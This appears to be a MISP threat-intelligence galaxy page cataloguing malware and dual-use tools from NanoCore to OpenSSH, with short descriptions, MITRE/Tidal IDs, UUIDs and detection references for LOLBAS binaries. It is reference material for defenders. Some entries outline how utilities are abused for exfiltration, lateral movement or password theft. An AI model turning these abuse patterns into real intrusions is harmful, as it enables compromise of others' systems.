NanoCore is a modular remote access tool developed in .NET that can be used to spy on victims and steal information. It has been used by threat actors since 2013.[DigiTrust NanoCore Jan 2017][Cofense NanoCore Mar 2018][PaloAlto NanoCore Feb 2016][Unit 42 Gorgon Group Aug 2018]
Internal MISP references
UUID db05dbaa-eb3a-4303-b37e-18d67e7e85a1 which can be used as unique global reference for NanoCore in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| platforms | ['Windows'] |
| software_attack_id | S0336 |
| source | MITRE |
| tags | ['4d767e87-4cf6-438a-927a-43d2d0beaab7', 'f8669b82-2194-49a9-8e20-92e7f9ab0a6f'] |
| type | ['malware'] |
Related clusters
To see the related clusters, click here.
NativeZone
NativeZone is the name given collectively to disposable custom Cobalt Strike loaders used by APT29 since at least 2021.[MSTIC Nobelium Toolset May 2021][SentinelOne NobleBaron June 2021]
Internal MISP references
UUID a814fd1d-8c2c-41b3-bb3a-30c4318c74c0 which can be used as unique global reference for NativeZone in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| platforms | ['Windows'] |
| software_attack_id | S0637 |
| source | MITRE |
| tags | ['84615fe0-c2a5-4e07-8957-78ebc29b4635'] |
| type | ['malware'] |
Related clusters
To see the related clusters, click here.
NavRAT
NavRAT is a remote access tool designed to upload, download, and execute files. It has been observed in attacks targeting South Korea. [Talos NavRAT May 2018]
Internal MISP references
UUID b410d30c-4db6-4239-950e-9b0e0521f0d2 which can be used as unique global reference for NavRAT in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| platforms | ['Windows'] |
| software_attack_id | S0247 |
| source | MITRE |
| tags | ['16b47583-1c54-431f-9f09-759df7b5ddb7'] |
| type | ['malware'] |
Related clusters
To see the related clusters, click here.
NBTscan
NBTscan is an open source tool that has been used by state groups to conduct internal reconnaissance within a compromised network.[Debian nbtscan Nov 2019][SecTools nbtscan June 2003][Symantec Waterbug Jun 2019][FireEye APT39 Jan 2019]
Internal MISP references
UUID 950f13e6-3ae3-411e-a2b2-4ba1afe6cb76 which can be used as unique global reference for NBTscan in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| platforms | ['macOS', 'Linux', 'Windows'] |
| software_attack_id | S0590 |
| source | MITRE |
| type | ['tool'] |
Related clusters
To see the related clusters, click here.
nbtstat
nbtstat is a utility used to troubleshoot NetBIOS name resolution. [TechNet Nbtstat]
Internal MISP references
UUID 81c2fc9b-8c2c-40f6-a327-dcdd64b70a7e which can be used as unique global reference for nbtstat in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| software_attack_id | S0102 |
| source | MITRE |
| type | ['tool'] |
Related clusters
To see the related clusters, click here.
NDiskMonitor
NDiskMonitor is a custom backdoor written in .NET that appears to be unique to Patchwork. [TrendMicro Patchwork Dec 2017]
Internal MISP references
UUID 6d42e6c5-3056-4ff1-8d5d-a736807ec84c which can be used as unique global reference for NDiskMonitor in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| platforms | ['Windows'] |
| software_attack_id | S0272 |
| source | MITRE |
| type | ['malware'] |
Related clusters
To see the related clusters, click here.
Nebulae
Nebulae Is a backdoor that has been used by Naikon since at least 2020.[Bitdefender Naikon April 2021]
Internal MISP references
UUID 38510bab-aece-4d7b-b621-7594c2c4fe14 which can be used as unique global reference for Nebulae in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| platforms | ['Windows'] |
| software_attack_id | S0630 |
| source | MITRE |
| type | ['malware'] |
Related clusters
To see the related clusters, click here.
Neoichor
Neoichor is C2 malware used by Ke3chang since at least 2019; similar malware families used by the group include Leeson and Numbldea.[Microsoft NICKEL December 2021]
Internal MISP references
UUID 8662e29e-5766-4311-894e-5ca52515ccbe which can be used as unique global reference for Neoichor in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| platforms | ['Windows'] |
| software_attack_id | S0691 |
| source | MITRE |
| tags | ['f8669b82-2194-49a9-8e20-92e7f9ab0a6f'] |
| type | ['malware'] |
Related clusters
To see the related clusters, click here.
Nerex
Nerex is a Trojan used by Elderwood to open a backdoor on compromised hosts. [Symantec Elderwood Sept 2012] [Symantec Nerex May 2012]
Internal MISP references
UUID de8b18c9-ebab-4126-96a9-282fa8829877 which can be used as unique global reference for Nerex in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| platforms | ['Windows'] |
| software_attack_id | S0210 |
| source | MITRE |
| type | ['malware'] |
Related clusters
To see the related clusters, click here.
Net
The Net utility is a component of the Windows operating system. It is used in command-line operations for control of users, groups, services, and network connections. [Microsoft Net Utility]
Net has a great deal of functionality, [Savill 1999] much of which is useful for an adversary, such as gathering system and network information for Discovery, moving laterally through SMB/Windows Admin Shares using net use commands, and interacting with services. The net1.exe utility is executed for certain functionality when net.exe is run and can be used directly in commands such as net1 user.
Internal MISP references
UUID c9b8522f-126d-40ff-b44e-1f46098bd8cc which can be used as unique global reference for Net in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| platforms | ['Windows'] |
| software_attack_id | S0039 |
| source | MITRE |
| tags | ['e1af18e3-3224-4e4c-9d0f-533768474508', 'cd1b5d44-226e-4405-8985-800492cf2865', 'ed2b3f47-3e07-4019-a9bf-ec9d87f28c96', '4e7ae33d-e040-4618-bccf-3b5e4aac81ed', '758c3085-2f79-40a8-ab95-f8a684737927', 'af5e9be5-b86e-47af-91dd-966a5e34a186', '35e694ec-5133-46e3-b7e1-5831867c3b55', '1dc8fd1e-0737-405a-98a1-111dd557f1b5', '15787198-6c8b-4f79-bf50-258d55072fee', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207'] |
| type | ['tool'] |
Related clusters
To see the related clusters, click here.
Net Crawler
Net Crawler is an intranet worm capable of extracting credentials using credential dumpers and spreading to systems on a network over SMB by brute forcing accounts with recovered passwords and using PsExec to execute a copy of Net Crawler. [Cylance Cleaver]
Internal MISP references
UUID 947c6212-4da8-48dd-9da9-ce4b077dd759 which can be used as unique global reference for Net Crawler in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| platforms | ['Windows'] |
| software_attack_id | S0056 |
| source | MITRE |
| type | ['malware'] |
Related clusters
To see the related clusters, click here.
NETEAGLE
NETEAGLE is a backdoor developed by APT30 with compile dates as early as 2008. It has two main variants known as “Scout” and “Norton.” [FireEye APT30]
Internal MISP references
UUID 852c300d-9313-442d-9b49-9883522c3f4b which can be used as unique global reference for NETEAGLE in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| platforms | ['Windows'] |
| software_attack_id | S0034 |
| source | MITRE |
| tags | ['f8669b82-2194-49a9-8e20-92e7f9ab0a6f'] |
| type | ['malware'] |
Related clusters
To see the related clusters, click here.
netsh
netsh is a scripting utility used to interact with networking components on local or remote systems. [TechNet Netsh]
Internal MISP references
UUID 803192b8-747b-4108-ae15-2d7481d39162 which can be used as unique global reference for netsh in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| platforms | ['Windows'] |
| software_attack_id | S0108 |
| source | MITRE |
| tags | ['e1af18e3-3224-4e4c-9d0f-533768474508', '064dc489-6b50-4cc1-bb9b-fe722f21aaf1', '758c3085-2f79-40a8-ab95-f8a684737927', 'af5e9be5-b86e-47af-91dd-966a5e34a186', '35e694ec-5133-46e3-b7e1-5831867c3b55', '1dc8fd1e-0737-405a-98a1-111dd557f1b5', '15787198-6c8b-4f79-bf50-258d55072fee', '303a3675-4855-4323-b042-95bb1d907cca', '84615fe0-c2a5-4e07-8957-78ebc29b4635', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207'] |
| type | ['tool'] |
Related clusters
To see the related clusters, click here.
netstat
netstat is an operating system utility that displays active TCP connections, listening ports, and network statistics. [TechNet Netstat]
Internal MISP references
UUID 132fb908-9f13-4bcf-aa64-74cbc72f5491 which can be used as unique global reference for netstat in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| software_attack_id | S0104 |
| source | MITRE |
| tags | ['758c3085-2f79-40a8-ab95-f8a684737927', 'af5e9be5-b86e-47af-91dd-966a5e34a186', '35e694ec-5133-46e3-b7e1-5831867c3b55', '1dc8fd1e-0737-405a-98a1-111dd557f1b5', '15787198-6c8b-4f79-bf50-258d55072fee', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207'] |
| type | ['tool'] |
Related clusters
To see the related clusters, click here.
NetTraveler
NetTraveler is malware that has been used in multiple cyber espionage campaigns for basic surveillance of victims. The earliest known samples have timestamps back to 2005, and the largest number of observed samples were created between 2010 and 2013. [Kaspersky NetTraveler]
Internal MISP references
UUID 1b8f9cf9-db8f-437d-800e-5ddd090fe30d which can be used as unique global reference for NetTraveler in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| platforms | ['Windows'] |
| software_attack_id | S0033 |
| source | MITRE |
| tags | ['f8669b82-2194-49a9-8e20-92e7f9ab0a6f'] |
| type | ['malware'] |
Related clusters
To see the related clusters, click here.
Netwalker
Netwalker is fileless ransomware written in PowerShell and executed directly in memory.[TrendMicro Netwalker May 2020]
Internal MISP references
UUID 5b4b395f-f61a-4bd6-94c1-fb45ed3cd13d which can be used as unique global reference for Netwalker in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| platforms | ['Windows'] |
| software_attack_id | S0457 |
| source | MITRE |
| tags | ['562e535e-19f5-4d6c-81ed-ce2aec544f09', '242bc007-5ac5-4d96-8638-699a06d06d24', 'e554bd60-5de3-4162-9ed3-66073ae9d6b3', '0e948c57-6c10-4576-ad27-9832cc2af3a1', '3d90eed2-862d-4f61-8c8f-0b8da3e45af0', '2743d495-7728-4a75-9e5f-b64854039792', '4fb4824e-1995-4c65-8c71-e818c0aa1086', '5e7433ad-a894-4489-93bc-41e90da90019', '7e7b0c67-bb85-4996-a289-da0e792d7172'] |
| type | ['malware'] |
NETWIRE
NETWIRE is a publicly available, multiplatform remote administration tool (RAT) that has been used by criminal and APT groups since at least 2012.[FireEye APT33 Sept 2017][McAfee Netwire Mar 2015][FireEye APT33 Webinar Sept 2017]
Internal MISP references
UUID c7d0e881-80a1-49ea-9c1f-b6e53cf399a8 which can be used as unique global reference for NETWIRE in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| platforms | ['macOS', 'Linux', 'Windows'] |
| software_attack_id | S0198 |
| source | MITRE |
| tags | ['6c6c0125-9631-4c2c-90ab-cfef374d5198'] |
| type | ['malware'] |
Related clusters
To see the related clusters, click here.
Network Scanner
Network Scanner (NS.exe) is a utility that can be used to enumerate file shares within a given environment.[The DFIR Report Dharma Ransomware June 2020]
Internal MISP references
UUID 56018455-7644-4e59-845a-986f55efcad4 which can be used as unique global reference for Network Scanner in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| owner | TidalCyberIan |
| platforms | ['Windows'] |
| software_attack_id | S5278 |
| source | Tidal Cyber |
| tags | ['d819ae1a-e385-49fd-88d5-f66660729ecb', 'e551ae97-d1b4-484e-9267-89f33829ec2c', '15787198-6c8b-4f79-bf50-258d55072fee', 'cd1b5d44-226e-4405-8985-800492cf2865', 'e1af18e3-3224-4e4c-9d0f-533768474508'] |
| type | ['tool'] |
Related clusters
To see the related clusters, click here.
ngrok
ngrok is a legitimate reverse proxy tool that can create a secure tunnel to servers located behind firewalls or on local machines that do not have a public IP. ngrok has been leveraged by threat actors in several campaigns including use for lateral movement and data exfiltration.[Zdnet Ngrok September 2018][FireEye Maze May 2020][Cyware Ngrok May 2019][MalwareBytes LazyScripter Feb 2021]
Internal MISP references
UUID 316ecd9d-ac0b-58c7-8083-5d9214c770f6 which can be used as unique global reference for ngrok in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| platforms | ['Windows'] |
| software_attack_id | S0508 |
| source | MITRE |
| tags | ['e1af18e3-3224-4e4c-9d0f-533768474508', 'ed2b3f47-3e07-4019-a9bf-ec9d87f28c96', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207', '6070668f-1cbd-4878-8066-c636d1d8659c', 'd8f7e071-fbfd-46f8-b431-e241bb1513ac', 'd75c1a80-0cb8-4a64-8379-10514cd44b1e', 'af5e9be5-b86e-47af-91dd-966a5e34a186', '758c3085-2f79-40a8-ab95-f8a684737927', '2185ed93-7e1c-4553-9452-c8411b5dca93', '904ad11a-20ca-479c-ad72-74bd5d9dc7e4', '1dc8fd1e-0737-405a-98a1-111dd557f1b5', '35e694ec-5133-46e3-b7e1-5831867c3b55', '15787198-6c8b-4f79-bf50-258d55072fee', 'febea5b6-2ea2-402b-8bec-f3f5b3f73c59'] |
| type | ['tool'] |
Related clusters
To see the related clusters, click here.
Nidiran
Nidiran is a custom backdoor developed and used by Suckfly. It has been delivered via strategic web compromise. [Symantec Suckfly March 2016]
Internal MISP references
UUID 3ae9acd7-39f8-45c6-b557-c7d9a40eed2c which can be used as unique global reference for Nidiran in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| platforms | ['Windows'] |
| software_attack_id | S0118 |
| source | MITRE |
| type | ['malware'] |
Related clusters
To see the related clusters, click here.
NightClub
NightClub is a modular implant written in C++ that has been used by MoustachedBouncer since at least 2014.[MoustachedBouncer ESET August 2023]
Internal MISP references
UUID b1963876-dbdc-5beb-ace3-acb6d7705543 which can be used as unique global reference for NightClub in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| platforms | ['Windows'] |
| software_attack_id | S1090 |
| source | MITRE |
| type | ['malware'] |
Related clusters
To see the related clusters, click here.
NirSoft
NirSoft is a self-described "freeware" utility that can be used to recover passwords.[NirSoft Website] According to U.S. cybersecurity authorities, ransomware actors such as those associated with the Royal ransomware operation have used the NirSoft utility to harvest passwords for malicious purposes.[#StopRansomware: Royal Ransomware | CISA]
Internal MISP references
UUID efa5fff4-f6db-4719-91c7-97dbe93099a8 which can be used as unique global reference for NirSoft in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| owner | TidalCyberIan |
| platforms | ['Windows'] |
| software_attack_id | S5271 |
| source | Tidal Cyber |
| tags | ['d819ae1a-e385-49fd-88d5-f66660729ecb', 'e551ae97-d1b4-484e-9267-89f33829ec2c', '15787198-6c8b-4f79-bf50-258d55072fee', 'e1af18e3-3224-4e4c-9d0f-533768474508', 'ed2b3f47-3e07-4019-a9bf-ec9d87f28c96', 'dcd6d78a-50e9-4fbd-a36a-06fbe6b7b40c', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207'] |
| type | ['tool'] |
Related clusters
To see the related clusters, click here.
njRAT
njRAT is a remote access tool (RAT) that was first observed in 2012. It has been used by threat actors in the Middle East.[Fidelis njRAT June 2013]
Internal MISP references
UUID 82996f6f-0575-45cd-8f7c-ba1b063d5b9f which can be used as unique global reference for njRAT in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| platforms | ['Windows'] |
| software_attack_id | S0385 |
| source | MITRE |
| tags | ['16b47583-1c54-431f-9f09-759df7b5ddb7', 'f8669b82-2194-49a9-8e20-92e7f9ab0a6f'] |
| type | ['malware'] |
Related clusters
To see the related clusters, click here.
Nltest
Nltest is a Windows command-line utility used to list domain controllers and enumerate domain trusts.[Nltest Manual]
Internal MISP references
UUID fbb1546a-f288-4e43-9e5c-14c94423c4f6 which can be used as unique global reference for Nltest in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| platforms | ['Windows'] |
| software_attack_id | S0359 |
| source | MITRE |
| tags | ['e1af18e3-3224-4e4c-9d0f-533768474508', '24f6ba0e-9230-4410-a9fb-b0f3b55de326', '15787198-6c8b-4f79-bf50-258d55072fee', 'cd1b5d44-226e-4405-8985-800492cf2865', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207'] |
| type | ['tool'] |
Related clusters
To see the related clusters, click here.
Nmap
According to its project website, "Nmap ("Network Mapper") is a free and open source utility for network discovery and security auditing".[Nmap: the Network Mapper]
Internal MISP references
UUID 042e61cf-a8e1-42ec-8974-a3b2e2037c08 which can be used as unique global reference for Nmap in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| owner | TidalCyberIan |
| platforms | ['Windows'] |
| software_attack_id | S5051 |
| source | Tidal Cyber |
| tags | ['ed2b3f47-3e07-4019-a9bf-ec9d87f28c96', '6ff40d11-214a-434b-b137-993e4ff5e34e', '15787198-6c8b-4f79-bf50-258d55072fee', 'cd1b5d44-226e-4405-8985-800492cf2865'] |
| type | ['tool'] |
Related clusters
To see the related clusters, click here.
NOKKI
NOKKI is a modular remote access tool. The earliest observed attack using NOKKI was in January 2018. NOKKI has significant code overlap with the KONNI malware family. There is some evidence potentially linking NOKKI to APT37.[Unit 42 NOKKI Sept 2018][Unit 42 Nokki Oct 2018]
Internal MISP references
UUID 31aa0433-fb6b-4290-8af5-a0d0c6c18548 which can be used as unique global reference for NOKKI in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| platforms | ['Windows'] |
| software_attack_id | S0353 |
| source | MITRE |
| tags | ['f8669b82-2194-49a9-8e20-92e7f9ab0a6f'] |
| type | ['malware'] |
Related clusters
To see the related clusters, click here.
NotPetya
NotPetya is malware that was used by Sandworm Team in a worldwide attack starting on June 27, 2017. While NotPetya appears as a form of ransomware, its main purpose was to destroy data and disk structures on compromised systems; the attackers never intended to make the encrypted data recoverable. As such, NotPetya may be more appropriately thought of as a form of wiper malware. NotPetya contains worm-like features to spread itself across a computer network using the SMBv1 exploits EternalBlue and EternalRomance.[Talos Nyetya June 2017][US-CERT NotPetya 2017][ESET Telebots June 2017][US District Court Indictment GRU Unit 74455 October 2020]
Internal MISP references
UUID 2538e0fe-1290-4ae1-aef9-e55d83c9eb23 which can be used as unique global reference for NotPetya in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| platforms | ['Windows'] |
| software_attack_id | S0368 |
| source | MITRE |
| tags | ['09de661e-60c4-43fb-bfef-df017215d1d8', '5a463cb3-451d-47f7-93e4-1886150697ce', 'c2380542-36f2-4922-9ed2-80ced06645c9', '7e7b0c67-bb85-4996-a289-da0e792d7172', 'e809d252-12cc-494d-94f5-954c49eb87ce'] |
| type | ['malware'] |
Related clusters
To see the related clusters, click here.
Npcap
According to its project website, "Npcap is the Nmap Project's packet capture (and sending) library for Microsoft Windows".[Npcap: Windows Packet Capture Library & Driver] Nmap is a utility used for network discovery and security auditing.
Internal MISP references
UUID d1817595-9186-4749-aeab-26c774c1885d which can be used as unique global reference for Npcap in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| owner | TidalCyberIan |
| platforms | ['Windows'] |
| software_attack_id | S5052 |
| source | Tidal Cyber |
| tags | ['15787198-6c8b-4f79-bf50-258d55072fee', 'cd1b5d44-226e-4405-8985-800492cf2865'] |
| type | ['tool'] |
Ntdsutil
Ntdsutil is a Windows command-line tool "that provides management facilities for Active Directory Domain Services (AD DS) and Active Directory Lightweight Directory Services (AD LDS)."[Ntdsutil Microsoft]
Internal MISP references
UUID 9af571bb-f3c7-434b-8187-3e4ceb0ec6fc which can be used as unique global reference for Ntdsutil in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| owner | TidalCyberIan |
| platforms | ['Windows'] |
| software_attack_id | S5018 |
| source | Tidal Cyber |
| tags | ['e1af18e3-3224-4e4c-9d0f-533768474508', '1da5eb1e-7ac5-4284-99cb-ce227cad8983', '758c3085-2f79-40a8-ab95-f8a684737927', 'af5e9be5-b86e-47af-91dd-966a5e34a186', '35e694ec-5133-46e3-b7e1-5831867c3b55', '1dc8fd1e-0737-405a-98a1-111dd557f1b5', '15787198-6c8b-4f79-bf50-258d55072fee', '303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207'] |
| type | ['tool'] |
Related clusters
To see the related clusters, click here.
ObliqueRAT
ObliqueRAT is a remote access trojan, similar to Crimson, that has been in use by Transparent Tribe since at least 2020.[Talos Oblique RAT March 2021][Talos Transparent Tribe May 2021]
Internal MISP references
UUID 97e8148c-e146-444c-9de5-6e2fdbda2f9f which can be used as unique global reference for ObliqueRAT in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| platforms | ['Windows'] |
| software_attack_id | S0644 |
| source | MITRE |
| tags | ['f8669b82-2194-49a9-8e20-92e7f9ab0a6f'] |
| type | ['malware'] |
Related clusters
To see the related clusters, click here.
OceanSalt
OceanSalt is a Trojan that was used in a campaign targeting victims in South Korea, United States, and Canada. OceanSalt shares code similarity with SpyNote RAT, which has been linked to APT1.[McAfee Oceansalt Oct 2018]
Internal MISP references
UUID f1723994-058b-4525-8e11-2f0c80d8f3a4 which can be used as unique global reference for OceanSalt in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| platforms | ['Windows'] |
| software_attack_id | S0346 |
| source | MITRE |
| type | ['malware'] |
Octopus
Octopus is a Windows Trojan written in the Delphi programming language that has been used by Nomadic Octopus to target government organizations in Central Asia since at least 2014.[Securelist Octopus Oct 2018][Security Affairs DustSquad Oct 2018][ESET Nomadic Octopus 2018]
Internal MISP references
UUID 8f04e609-8773-4529-b247-d32f530cc453 which can be used as unique global reference for Octopus in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| platforms | ['Windows'] |
| software_attack_id | S0340 |
| source | MITRE |
| type | ['malware'] |
Related clusters
To see the related clusters, click here.
Odbcconf
This object contains information sourced from the Living Off The Land Binaries, Scripts and Libraries (LOLBAS) project, which is licensed under GNU General Public License v3.0.
Description: Used in Windows for managing ODBC connections
Author: Oddvar Moe
Paths: * C:\Windows\System32\odbcconf.exe * C:\Windows\SysWOW64\odbcconf.exe
Resources: * https://gist.github.com/NickTyrer/6ef02ce3fd623483137b45f65017352b * https://github.com/woanware/application-restriction-bypasses * https://www.hexacorn.com/blog/2020/08/23/odbcconf-lolbin-trifecta/
Detection: * Sigma: proc_creation_win_odbcconf_response_file.yml * Sigma: proc_creation_win_odbcconf_response_file_susp.yml * Elastic: defense_evasion_unusual_process_network_connection.toml * Elastic: defense_evasion_network_connection_from_windows_binary.toml[LOLBAS Odbcconf]
Internal MISP references
UUID 5e434819-7f4a-440c-a9bd-7675c0218be1 which can be used as unique global reference for Odbcconf in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| owner | TidalCyberIan |
| platforms | ['Windows'] |
| software_attack_id | S5134 |
| source | Tidal Cyber |
| tags | ['64825d12-3cd6-4446-a93c-ff7d8ec13dc8', '303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207'] |
| type | ['tool'] |
Related clusters
To see the related clusters, click here.
OfflineScannerShell
This object contains information sourced from the Living Off The Land Binaries, Scripts and Libraries (LOLBAS) project, which is licensed under GNU General Public License v3.0.
Description: Windows Defender Offline Shell
Author: Elliot Killick
Paths: * C:\Program Files\Windows Defender\Offline\OfflineScannerShell.exe
Resources: None Provided
Detection: * Sigma: proc_creation_win_lolbas_offlinescannershell.yml * IOC: OfflineScannerShell.exe should not be run on a normal workstation[OfflineScannerShell.exe - LOLBAS Project]
Internal MISP references
UUID 8bc7c62a-110d-451b-9ca6-bc48a13e72d4 which can be used as unique global reference for OfflineScannerShell in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| owner | TidalCyberIan |
| platforms | ['Windows'] |
| software_attack_id | S5135 |
| source | Tidal Cyber |
| tags | ['303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207'] |
| type | ['tool'] |
Okrum
Okrum is a Windows backdoor that has been seen in use since December 2016 with strong links to Ke3chang.[ESET Okrum July 2019]
Internal MISP references
UUID f9bcf0a1-f287-44ec-8f53-6859d41e041c which can be used as unique global reference for Okrum in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| platforms | ['Windows'] |
| software_attack_id | S0439 |
| source | MITRE |
| tags | ['8bf128ad-288b-41bc-904f-093f4fdde745'] |
| type | ['malware'] |
Related clusters
To see the related clusters, click here.
OLDBAIT
OLDBAIT is a credential harvester used by APT28. [FireEye APT28] [FireEye APT28 January 2017]
Internal MISP references
UUID 479814e2-2656-4ea2-9e79-fcdb818f703e which can be used as unique global reference for OLDBAIT in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| platforms | ['Windows'] |
| software_attack_id | S0138 |
| source | MITRE |
| tags | ['4d767e87-4cf6-438a-927a-43d2d0beaab7'] |
| type | ['malware'] |
Related clusters
To see the related clusters, click here.
Olympic Destroyer
Olympic Destroyer is malware that was used by Sandworm Team against the 2018 Winter Olympics, held in Pyeongchang, South Korea. The main purpose of the malware was to render infected computer systems inoperable. The malware leverages various native Windows utilities and API calls to carry out its destructive tasks. Olympic Destroyer has worm-like features to spread itself across a computer network in order to maximize its destructive impact.[Talos Olympic Destroyer 2018][US District Court Indictment GRU Unit 74455 October 2020]
Internal MISP references
UUID 073b5288-11d6-4db0-9f2c-a1816847d15c which can be used as unique global reference for Olympic Destroyer in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| platforms | ['Windows'] |
| software_attack_id | S0365 |
| source | MITRE |
| tags | ['e809d252-12cc-494d-94f5-954c49eb87ce'] |
| type | ['malware'] |
Related clusters
To see the related clusters, click here.
OneDriveStandaloneUpdater
This object contains information sourced from the Living Off The Land Binaries, Scripts and Libraries (LOLBAS) project, which is licensed under GNU General Public License v3.0.
Description: OneDrive Standalone Updater
Author: Elliot Killick
Paths: * %localappdata%\Microsoft\OneDrive\OneDriveStandaloneUpdater.exe
Resources: * https://github.com/LOLBAS-Project/LOLBAS/pull/153
Detection: * IOC: HKCU\Software\Microsoft\OneDrive\UpdateOfficeConfig\UpdateRingSettingURLFromOC being set to a suspicious non-Microsoft controlled URL * IOC: Reports of downloading from suspicious URLs in %localappdata%\OneDrive\setup\logs\StandaloneUpdate_*.log files * Sigma: registry_set_lolbin_onedrivestandaloneupdater.yml[OneDriveStandaloneUpdater.exe - LOLBAS Project]
Internal MISP references
UUID 49ef42bc-0958-4b61-9593-a4af69432410 which can be used as unique global reference for OneDriveStandaloneUpdater in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| owner | TidalCyberIan |
| platforms | ['Windows'] |
| software_attack_id | S5136 |
| source | Tidal Cyber |
| tags | ['b6116080-8fbf-4e9f-9206-20b025f2cf23', '303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207'] |
| type | ['tool'] |
OnionDuke
OnionDuke is malware that was used by APT29 from 2013 to 2015. [F-Secure The Dukes]
Internal MISP references
UUID 6056bf36-fb45-498d-a285-5f98ae08b090 which can be used as unique global reference for OnionDuke in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| platforms | ['Windows'] |
| software_attack_id | S0052 |
| source | MITRE |
| tags | ['84615fe0-c2a5-4e07-8957-78ebc29b4635'] |
| type | ['malware'] |
Related clusters
To see the related clusters, click here.
OopsIE
OopsIE is a Trojan used by OilRig to remotely execute commands as well as upload/download files to/from victims. [Unit 42 OopsIE! Feb 2018]
Internal MISP references
UUID 4f1894d4-d085-4348-af50-dfda257a9e18 which can be used as unique global reference for OopsIE in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| platforms | ['Windows'] |
| software_attack_id | S0264 |
| source | MITRE |
| tags | ['8bf128ad-288b-41bc-904f-093f4fdde745'] |
| type | ['malware'] |
Related clusters
To see the related clusters, click here.
OpenConsole
This object contains information sourced from the Living Off The Land Binaries, Scripts and Libraries (LOLBAS) project, which is licensed under GNU General Public License v3.0.
Description: Console Window host for Windows Terminal
Author: Nasreddine Bencherchali
Paths: * C:\Program Files (x86)\Microsoft Visual Studio\2019\Community\Common7\IDE\CommonExtensions\Microsoft\Terminal\ServiceHub\os64\OpenConsole.exe * C:\Program Files (x86)\Microsoft Visual Studio\2019\Community\Common7\IDE\CommonExtensions\Microsoft\Terminal\ServiceHub\os86\OpenConsole.exe * C:\Program Files\Microsoft Visual Studio\2022\Community\Common7\IDE\CommonExtensions\Microsoft\Terminal\ServiceHub\os64\OpenConsole.exe
Resources: * https://twitter.com/nas_bench/status/1537563834478645252
Detection: * IOC: OpenConsole.exe spawning unexpected processes * Sigma: proc_creation_win_lolbin_openconsole.yml[OpenConsole.exe - LOLBAS Project]
Internal MISP references
UUID 54030309-671d-4e4b-b9c0-619cd07f5e05 which can be used as unique global reference for OpenConsole in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| owner | TidalCyberIan |
| platforms | ['Windows'] |
| software_attack_id | S5230 |
| source | Tidal Cyber |
| tags | ['1dd2d703-fed1-41d2-9843-7b276ef3d6f2', '303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207'] |
| type | ['tool'] |
OpenSSH
OpenSSH is a publicly available tool for traffic encryption and remote login using the Secure Shell ("SSH") protocol. According to its project website, it also "provides a large suite of secure tunneling capabilities, several authentication methods, and sophisticated configuration options".[OpenSSH Project Page]
Internal MISP references
